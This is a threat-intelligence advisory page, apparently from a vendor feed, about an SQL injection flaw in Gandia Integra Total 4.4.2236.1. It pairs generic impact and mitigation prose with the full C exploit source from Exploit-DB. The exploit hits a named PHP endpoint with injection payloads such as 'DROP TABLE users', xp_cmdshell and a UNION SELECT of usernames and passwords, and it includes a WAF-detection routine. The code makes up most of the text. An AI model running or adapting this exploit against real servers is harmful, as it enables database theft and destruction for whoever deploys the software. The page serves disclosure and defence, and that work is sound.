Gandia Integra Total 4.4.2236.1 - SQL Injection
Gandia Integra Total 4.4.2236.1 - SQL Injection
AI Analysis
Technical Summary
The security threat concerns an SQL Injection vulnerability in Gandia Integra Total version 4.4.2236.1, a web-based software product. SQL Injection is a critical web application vulnerability that allows attackers to inject malicious SQL statements into input fields or parameters, which the backend database executes. This can lead to unauthorized data retrieval, data manipulation, or deletion, and in some cases, full system compromise if the database server has elevated privileges. The exploit code for this vulnerability is publicly available on Exploit-DB (ID 52388) and is implemented in the C programming language, indicating that attackers can automate exploitation or integrate it into larger attack frameworks. Although no active exploitation in the wild has been reported, the availability of exploit code significantly lowers the barrier for attackers to attempt exploitation. The lack of official patches or updates at the time of reporting increases the urgency for organizations to implement interim mitigations. The vulnerability affects web components of Gandia Integra Total, which may be used in various business environments, making it a relevant threat to organizations relying on this software for critical operations. The medium severity rating provided likely reflects the balance between the exploitability and the impact, but given the nature of SQL Injection vulnerabilities, the potential consequences can be severe if exploited successfully.
Potential Impact
For European organizations, exploitation of this SQL Injection vulnerability could result in unauthorized access to sensitive business data, including customer information, financial records, or intellectual property. Data integrity could be compromised through unauthorized modifications or deletions, potentially disrupting business operations and damaging organizational reputation. In sectors such as finance, healthcare, or government, where data confidentiality and integrity are paramount, the impact could be particularly severe. Additionally, successful exploitation could serve as a foothold for further network compromise, lateral movement, or deployment of ransomware. The availability of exploit code in C facilitates automated attacks, increasing the likelihood of exploitation attempts. Organizations without timely mitigation may face regulatory consequences under GDPR if personal data is exposed. The threat also poses risks to service availability if attackers leverage the vulnerability to execute denial-of-service conditions or corrupt backend databases.
Mitigation Recommendations
Organizations should immediately conduct a thorough code audit focusing on input validation and parameterized queries within Gandia Integra Total web components. Employing prepared statements or stored procedures can effectively prevent SQL Injection. Until official patches are released, implement Web Application Firewalls (WAFs) with custom rules to detect and block SQL Injection payloads targeting this software. Monitor logs for unusual database query patterns or error messages indicative of injection attempts. Restrict database user privileges to the minimum necessary to limit the impact of any successful injection. Regularly update and patch all related software components as vendors release fixes. Conduct penetration testing to verify the effectiveness of mitigations. Educate development and security teams about secure coding practices to prevent similar vulnerabilities in future releases. If possible, isolate the affected application within segmented network zones to reduce lateral movement risk.
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands
Indicators of Compromise
- exploit-code: /* * Author : Byte Reaper * CVE : CVE-2025-41373 * Vulnerability : SQL * Affected Path : /encuestas/integraweb_v4/integra/html/view/hislistadoacciones.php?idestudio=<input> * Affected Versions : 2.1.2217.3 to v4.4.2236.1 * Description: * This endpoint concatenates the `idestudio` parameter directly into an SQL query * without proper sanitization or parameterization, allowing an attacker to inject * arbitrary SQL. We leverage both boolean-based and time-based techniques to detect. */ #include <stdio.h> #include <string.h> #include <curl/curl.h> #include "argparse.h" #include <stdlib.h> #include <time.h> #include <unistd.h> #define FULL_URL 4300 int verbose = 0; int useC = 0; const char *url = NULL; const char *cookies = NULL; void sleepSyscall(void) { struct timespec sleepR; sleepR.tv_sec = 1; sleepR.tv_nsec = 0; __asm__ volatile ( "mov $35, %%rax\n\t" "mov %0, %%rdi\n\t" "xor %%rsi, %%rsi\n\t" "syscall\n\t" : : "r" (&sleepR) : "rax", "rdi", "rsi", "rcx", "r11", "memory" ); } void exitAssembly(void ) { __asm__ volatile ( "xor %%rdi, %%rdi\n\t" "mov $0x3C, %%rax\n\t" "syscall\n\t" : : : "rax", "rdi" ); } void uid(void) { const char *mes1 = "\e[1;36m[+] Run Exploit Root Successfully\e[0m\n"; size_t len1 = strlen(mes1); const char *mes2 = "\e[1;31m[-] Please Run Exploit In Root, Exit...\e[0m\n"; size_t len2 = strlen(mes2); __asm__ volatile( "mov $107, %%rax\n\t" "syscall\n\t" "cmp $0, %%rax\n\t" "JZ .root\n\t" "jmp .not_root\n\t" ".root:\n\t" "mov $1, %%rax\n\t" "mov $1, %%rdi\n\t" "mov %[mes1], %%rsi\n\t" "mov %[len1], %%rdx\n\t" "syscall\n\t" "jmp .end\n\t" ".not_root:\n\t" "mov $1, %%rax\n\t" "mov $1, %%rdi\n\t" "mov %[mes2], %%rsi\n\t" "mov %[len2], %%rdx\n\t" "syscall\n\t" ".end:\n\t" : : [mes1] "r" (mes1), [len1] "r" (len1), [mes2] "r" (mes2), [len2] "r" (len2) : "rax", "rdi", "rsi", "rdx", "rcx", "r11", "memory" ); } const char *payload[] = { "' OR '1'='1", "\" OR \"1\"=\"1", "' OR 1=1 --", "\" OR 1=1 --", "' OR '1'='1' --", "' OR 1=1#", "' OR 1=1/*", "admin'--", "admin' #", "admin'/*", "' OR 1=1-- -", "' OR/**/1=1--", "'/**/OR/**/1=1#", "' OR%%201=1--", "' OR%%091=1--", "' OR%0a1=1--", "' OR%%0b1=1--", "' oR 1=1--", "' Or 1=1--", "' oR/**/1=1--", "' OR 0x31=0x31--", "1; DROP TABLE users --", "1; EXEC xp_cmdshell('dir') --", "UNION SELECT NULL,NULL,NULL --", "UNION SELECT username,password FROM users --", "' UNION SELECT NULL,NULL,NULL --", "' UNION SELECT NULL,NULL,NULL#", ",(select * from (select(sleep(4)))a)", "';WAITFOR DELAY '0:0:4'--", NULL }; const char *word[] = { "SQL syntax", "syntax error", "mysql_fetch", "mysql_num_rows", "You have an error in your SQL syntax", "Warning: mysql", "Warning: pg_", "Unclosed quotation mark", "Microsoft OLE DB Provider for SQL Server", "Microsoft SQL Native Client error", "ODBC SQL Server Driver", "ORA-01756", "ORA-00933", "SQLSTATE", "PDOException", "invalid query", "mysql_numrows()", "mysql_result()", "mysql_query()", "Query failed", "Syntax error", "DB error", "error in your SQL syntax", "Unexpected end of SQL command", "Incorrect syntax near", "user", "admin", NULL }; struct Mem { char *buffer; size_t len; }; size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) { size_t total = size * nmemb; struct Mem *m = (struct Mem *)userdata; char *tmp = realloc(m->buffer, m->len + total + 1); if (tmp == NULL) { printf("\e[1;31m[-] Failed to allocate memory!\e[0m\n"); exitAssembly(); } m->buffer = tmp; memcpy(&(m->buffer[m->len]), ptr, total); m->len += total; m->buffer[m->len] = '\0'; return total; } void clean(char *buffer, size_t len, CURL *curl,char *encode ) { free(buffer); buffer = NULL; len = 0; curl_easy_cleanup(curl); curl_free(encode); } int waf = 0; int wafD(const char *urlW) { CURL *curl = curl_easy_init(); CURLcode res; struct Mem wafServer; wafServer.buffer= NULL; wafServer.len = 0; const char *payloadSql = "OR 1=1 --"; char *encode = curl_easy_escape(curl, payloadSql, strlen(payloadSql)); char full[FULL_URL]; if (!encode) { printf("\e[1;31m[-] Error Encode Payload !\e[0m\n"); clean(wafServer.buffer, wafServer.len, curl, encode); exitAssembly(); } int len = snprintf(full, sizeof(full), "%s/encuestas/integraweb_v4/integra/html/view/hislistadoacciones.php?idestudio=%s", urlW, encode); if (len < 0 || (size_t)len >= sizeof(full)) { printf("\e[1;31m[-] FULL URL Is Long \n"); clean(wafServer.buffer, wafServer.len,curl,encode); exitAssembly(); } if (curl == NULL || !curl) { printf("\e[1;31m[-] Error Create Object CURL !\e[0m\n"); clean(wafServer.buffer, wafServer.len, curl, encode); exitAssembly(); } int result = 0; if (curl) { printf("\e[1;35m===========================================================================================\e[0m\n"); printf("\e[1;35m[+] Scan WAF Start...\e[0m\n"); printf("\e[1;37m[+] FULL URL : %s\e[0m\n", full); curl_easy_setopt(curl, CURLOPT_URL, full); curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); if (verbose) { printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n"); curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } curl_easy_setopt(curl, CURLOPT_WRITEDATA, &wafServer); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); sleepSyscall(); curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); struct curl_slist *h = NULL; h = curl_slist_append(h, "User-Agent: sqlmap"); h = curl_slist_append(h, "Accept-Encoding: gzip, deflate, br"); h = curl_slist_append(h, "Accept-Language: en-US,en;q=0.5"); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h); res = curl_easy_perform(curl); curl_slist_free_all(h); double timeWaf = 0; if (res == CURLE_OK) { int a = 0; int b =1; int c = 3; int d = 4; long code; curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &code); curl_easy_getinfo(curl, CURLINFO_TOTAL_TIME, &timeWaf); printf("\e[1;36m[+] Check Http Code...\e[0m\n"); printf("\e[1;32m[+] Http Code => %ld\e[0m\n", code); if (code == 500 || code == 403 || code == 406) { printf("\e[1;35m---------------------------------------\e[0m\n"); printf("\e[1;34m[+] Http Code (500, 403, 406) ! \e[0m\n"); printf("\e[1;34m[+] Waf Detect (Page Not Found) \e[0m\n"); printf("\e[1;35m--------------------------------------\e[0m\n"); a = 1; } else { printf("\e[1;31m[-] Not Detected Waf (HTTP CODE) !\e[0m\n"); } printf("\e[1;36m[+] Check Response Server (NULL)\e[0m\n"); const char *wordWaf[] = { "cloudflare", "sucuri", "mod_security", "incapsula", "akamai", "f5-big-ip", "waf", "firewall", "blocked", "access denied", "forbidden", "security", "protected by", "request rejected", "webshield", "ddos protection", "intrusion prevention", "proxy server", "bot detection", "deny", "you have been blocked", "unauthorized", "client blocked", "blocked by firewall", "bad request", "threat", "filtering", "deny access", "rule id", NULL }; if (code >= 200 && code < 300) { if (wafServer.buffer) { printf("\e[1;35m-------------------------------------------------------------\e[0m\n"); printf("\e[1;34m[+] Http Code (200,202...) ! \e[0m\n"); printf("\e[1;34m[+] Waf Detect, Response is NULL And Http Code Positive \e[0m\n"); printf("\e[1;35m-------------------------------------------------------------\e[0m\n"); b = 1; } else { printf("\e[1;31m[-] Response Buffer Not NULL\e[0m\n"); printf("\e[1;31m[-] Waf Not Detected (NULL Response)!\e[0m\n"); } } printf("\e[1;36m[+] Check Response Buffer...\n"); for (int u = 0; wordWaf[u] != NULL; u++) { if (strstr(wafServer.buffer, wordWaf[u]) != NULL) { printf("\e[1;35m-------------------------------------------------------------\e[0m"); printf("\e[1;34m[+] Waf Detect, Word Waf Found \e[0m\n"); printf("\e[1;34m[+] Word : %s \e[0m\n", wordWaf[u]); printf("\e[1;35m-------------------------------------------------------------\e[0m"); c = 1; } else { if (verbose) { printf("\e[1;31m[-] Word Not Found in Response : %s\e[0m\n", wordWaf[u]); printf("\e[1;35m====================================================\e[0m\n"); } } } printf("\e[1;36m[+] Check Time Response Server...\e[0m\n"); if (timeWaf >= 3.0) { printf("\e[1;34m[+] Suspicious delay in response: %.2f sec\e[0m\n", timeWaf); } else { printf("\e[1;31m[-] Not Detect Waf (Time) !\e[0m\n"); } printf("\e[1;35m==========================\e[0m\n"); printf("\e[1;33m[+] Result Scan : \e[0m\n"); if (a || b || c || d) { printf("\e[1;31m[-] Waf Detected \e[0m\n"); result = 0; } else { printf("\e[1;34m[+] Not Detect Waf !\e[0m\n"); result =1; } printf("\e[1;35m===========================================================================================\e[0m\n"); } else { printf("\e[1;31m[-] No connection reset error.\e[0m\n"); printf("\e[1;31m[-] Error Send Request, Please Check Your Connection !\e[0m\n"); printf("\e[1;31m[-] Error : %s\e[0m\n", curl_easy_strerror(res)); } } curl_easy_cleanup(curl); free(wafServer.buffer); wafServer.buffer = NULL; wafServer.len = 0; return result; } void httpRequest(const char *url) { CURL *curl = curl_easy_init(); struct Mem response; CURLcode res; response.buffer =NULL; response.len = 0; if (!curl || curl == NULL) { printf("\e[1;31m[-] Error Create Object CURL !\e[0m\n"); printf("\e[1;31m[-] Please Check Your Connection\e[0m\n"); exitAssembly(); } int y = 0; if (curl) { printf("\e[1;34m[+] Create CURL Successfully\e[0m\n"); for (int pL = 0; payload[pL] != NULL; pL++) { char full[FULL_URL]; char *encodePayload = curl_easy_escape(curl, payload[pL], strlen(payload[pL])); if (!encodePayload) { printf("\e[1;31m[-] Error Encode Payload !\e[0m\n"); clean(response.buffer, response.len, curl, encodePayload); exitAssembly(); } int lenF = snprintf(full, sizeof(full), "%s/encuestas/integraweb_v4/integra/html/view/hislistadoacciones.php?idestudio=%s", url,encodePayload); if (lenF < 0 || (size_t)lenF >= sizeof(full)) { printf("\e[1;31m[-] FULL URL is LONG ! \n"); clean(response.buffer, response.len, curl, encodePayload); exitAssembly(); } printf("\e[1;37m[+] Encode Payload : %s\e[0m\n", encodePayload); printf("\e[1;37m[+] Base URL : %s\e[0m\n", url); printf("\e[1;37m[+] Full URL : %s\e[0m\n", full); char ip[256]; if (sscanf(full, "http://%255[^/]/encuestas/", ip) == 1) { printf("\e[1;37m[+] target Ip / Domain : %s\e[0m\n", (char *)ip); y = 1; } else { printf("\e[1;31m[-] Error Get Target Ip In FULL URL !\e[0m\n"); y = 0; } curl_easy_setopt(curl, CURLOPT_URL, full); if (useC) { curl_easy_setopt(curl, CURLOPT_COOKIEFILE, cookies); curl_easy_setopt(curl, CURLOPT_COOKIEJAR, cookies); } curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); if (verbose) { printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n"); curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); sleepSyscall(); curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); struct curl_slist *headers = NULL; headers = curl_slist_append(headers, "Accept-Language: en-US,en"); headers = curl_slist_append(headers, "Connection: keep-alive"); char r[130]; int lenR = snprintf(r, sizeof(r), "Referer: %s", url); if (lenR < 0 || (size_t)lenR >= sizeof(r)) { printf("\e[1;31m[-] Len Header Referer Is long !\e[0m\n"); clean(response.buffer,response.len, curl, encodePayload); exitAssembly(); } headers = curl_slist_append(headers, r); headers = curl_slist_append(headers, "Cache-Control: no-cache"); headers = curl_slist_append(headers, "Content-Type: application/x_222-form-urlencoded"); if (y == 0) { char host[230]; int lenHo = snprintf(host , sizeof(host), "Host: %s",ip); headers = curl_slist_append(headers, host); } headers = curl_slist_append(headers, "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36"); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers); res = curl_easy_perform(curl); curl_slist_free_all(headers); free(response.buffer); response.buffer = NULL; response.len = 0; time_t start = clock(); if (res == CURLE_OK) { long httpCode = 0; curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &httpCode); printf("\e[1;31m--------------------------------------------------------------------------------------------------------\n"); printf("\e[1;36m[+] Request sent successfully\e[0m\n"); if (response.buffer) { printf("\e[1;34m\n======================================== [RESPONSE] ========================================\e[0m\n"); printf("%s\n", response.buffer); printf("\e[1;34m==============================================================================================\e[0m\n"); } else { printf("\e[1;31m[-] Response Is NULL !\e[0m\n"); } if (httpCode >= 200 && httpCode < 300) { for (int o = 0; word[o] != NULL; o++) { printf("\e[1;36m[+] Positive Http Code (200 < 300) : %ld\e[0m\n",httpCode); if (response.buffer) { if (strstr(response.buffer, word[o]) != NULL) { printf("\e[1;34m[+] Word Found In Response : %s\e[0m\n", word[o]); printf("\e[1;34m[+] The vulnerability CVE-2025-41373 exists on the server\e[0m\n"); printf("\e[1;35m\n======================================== [RESPONSE] ========================================\e[0m\n"); printf("%s\n", response.buffer); printf("\e[1;32m[Len] : %zu\e[0m\n", response.len); printf("\e[1;35m==============================================================================================\e[0m\n"); } else { if (verbose) { printf("\e[1;31m[-] Word Not Found In Response : %s\e[0m\n", word[o]); } continue; } } } time_t end = clock(); double totalTime = (double)(end - start) / CLOCKS_PER_SEC; if (totalTime <= 5.5) // Payload Sleep 4s + Assembly Sleep (1s) = 4 + 1 + 0.5 (Time (LIBCURL)) = 5.5 { printf("\e[1;33m[+] Check Time Base....\e[0m\n"); printf("\e[1;34m[+] Time Based Injection Detected .\e[0m\n"); printf("\e[1;34m[+] Total Time Sleep Server : %f\e[0m\n", totalTime); } else { printf("\e[1;31m [-] Time Based Injection Not Detected !\e[0m\n"); } } else { printf("\e[1;31m[-] HTTP Code Not Range Positive (200 < 300) : %ld\e[0m\n", httpCode); } } else { printf("\e[1;31m[-] Error Send Request\e[0m\n"); printf("\e[1;31m[-] Error : %s\e[0m\n", curl_easy_strerror(res)); } printf("\e[1;34m[+] Try Next Payload SQL : %s\e[0m\n", encodePayload); } } response.buffer = NULL; response.len = 0; curl_easy_cleanup(curl); } int main(int argc, const char **argv) { printf( "\e[1;31m" "▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▖▖▗ ▄▖▄▖▄▖ \n" "▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▙▌▜ ▄▌ ▌▄▌ \n" "▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▌▟▖▄▌ ▌▄▌ \n" "\e[1;37m \t\tByte Reaper\e[0m\n" ); curl_global_init(CURL_GLOBAL_DEFAULT); int noColor = 0; int w = 0; struct argparse_option options[] = { OPT_HELP(), OPT_STRING('u', "url", &url, "Target IP "), OPT_STRING('c', "cookies", &cookies, "cookies File"), OPT_BOOLEAN('v', "verbose", &verbose, "Verbose Mode"), OPT_BOOLEAN('w', "waf", &w, "Scan Waf"), OPT_END(), }; struct argparse argparse; argparse_init(&argparse, options, NULL, 0); argparse_parse(&argparse, argc, argv); if (url == NULL) { printf("[-] Please Enter Target URL !\n"); printf("[-] Ex : ./exploit -u <URL> \n"); curl_global_cleanup(); exitAssembly(); }; printf("---------------------------------------------------------------------\n\n"); printf("[+] Start Exploit (CVE-2025-54589)...\n"); uid(); if (cookies) { useC = 1; } if (verbose) { verbose = 1; } if (w) { wafD(url); } else { httpRequest(url); } curl_global_cleanup(); return 0; }
Gandia Integra Total 4.4.2236.1 - SQL Injection
Description
Gandia Integra Total 4.4.2236.1 - SQL Injection
AI-Powered Analysis
Technical Analysis
The security threat concerns an SQL Injection vulnerability in Gandia Integra Total version 4.4.2236.1, a web-based software product. SQL Injection is a critical web application vulnerability that allows attackers to inject malicious SQL statements into input fields or parameters, which the backend database executes. This can lead to unauthorized data retrieval, data manipulation, or deletion, and in some cases, full system compromise if the database server has elevated privileges. The exploit code for this vulnerability is publicly available on Exploit-DB (ID 52388) and is implemented in the C programming language, indicating that attackers can automate exploitation or integrate it into larger attack frameworks. Although no active exploitation in the wild has been reported, the availability of exploit code significantly lowers the barrier for attackers to attempt exploitation. The lack of official patches or updates at the time of reporting increases the urgency for organizations to implement interim mitigations. The vulnerability affects web components of Gandia Integra Total, which may be used in various business environments, making it a relevant threat to organizations relying on this software for critical operations. The medium severity rating provided likely reflects the balance between the exploitability and the impact, but given the nature of SQL Injection vulnerabilities, the potential consequences can be severe if exploited successfully.
Potential Impact
For European organizations, exploitation of this SQL Injection vulnerability could result in unauthorized access to sensitive business data, including customer information, financial records, or intellectual property. Data integrity could be compromised through unauthorized modifications or deletions, potentially disrupting business operations and damaging organizational reputation. In sectors such as finance, healthcare, or government, where data confidentiality and integrity are paramount, the impact could be particularly severe. Additionally, successful exploitation could serve as a foothold for further network compromise, lateral movement, or deployment of ransomware. The availability of exploit code in C facilitates automated attacks, increasing the likelihood of exploitation attempts. Organizations without timely mitigation may face regulatory consequences under GDPR if personal data is exposed. The threat also poses risks to service availability if attackers leverage the vulnerability to execute denial-of-service conditions or corrupt backend databases.
Mitigation Recommendations
Organizations should immediately conduct a thorough code audit focusing on input validation and parameterized queries within Gandia Integra Total web components. Employing prepared statements or stored procedures can effectively prevent SQL Injection. Until official patches are released, implement Web Application Firewalls (WAFs) with custom rules to detect and block SQL Injection payloads targeting this software. Monitor logs for unusual database query patterns or error messages indicative of injection attempts. Restrict database user privileges to the minimum necessary to limit the impact of any successful injection. Regularly update and patch all related software components as vendors release fixes. Conduct penetration testing to verify the effectiveness of mitigations. Educate development and security teams about secure coding practices to prevent similar vulnerabilities in future releases. If possible, isolate the affected application within segmented network zones to reduce lateral movement risk.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52388
- Has Exploit Code
- true
- Code Language
- c
Indicators of Compromise
Exploit Source Code
Exploit code for Gandia Integra Total 4.4.2236.1 - SQL Injection
/* * Author : Byte Reaper * CVE : CVE-2025-41373 * Vulnerability : SQL * Affected Path : /encuestas/integraweb_v4/integra/html/view/hislistadoacciones.php?idestudio=<input> * Affected Versions : 2.1.2217.3 to v4.4.2236.1 * Description: * This endpoint concatenates the `idestudio` parameter directly into an SQL query * without proper sanitization or parameterization, allowing an attacker to inject * arbitrary SQL. We leverage both boolean-based and time-based tech... (23043 more characters)
Threat ID: 68900844ad5a09ad00dd9e0b
Added to database: 8/4/2025, 1:09:24 AM
Last enriched: 10/27/2025, 1:41:28 AM
Last updated: 11/6/2025, 4:04:31 AM
Views: 67
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Related Threats
Critical Site Takeover Flaw Affects 400K WordPress Sites
CriticalResearchers Find ChatGPT Vulnerabilities That Let Attackers Trick AI Into Leaking Data
MediumCISA warns of critical CentOS Web Panel bug exploited in attacks
CriticalWebinar Today: Scattered Spider Exposed – Critical Takeaways for Cyber Defenders
CriticalHow an Attacker Drained $128M from Balancer Through Rounding Error Exploitation
MediumActions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.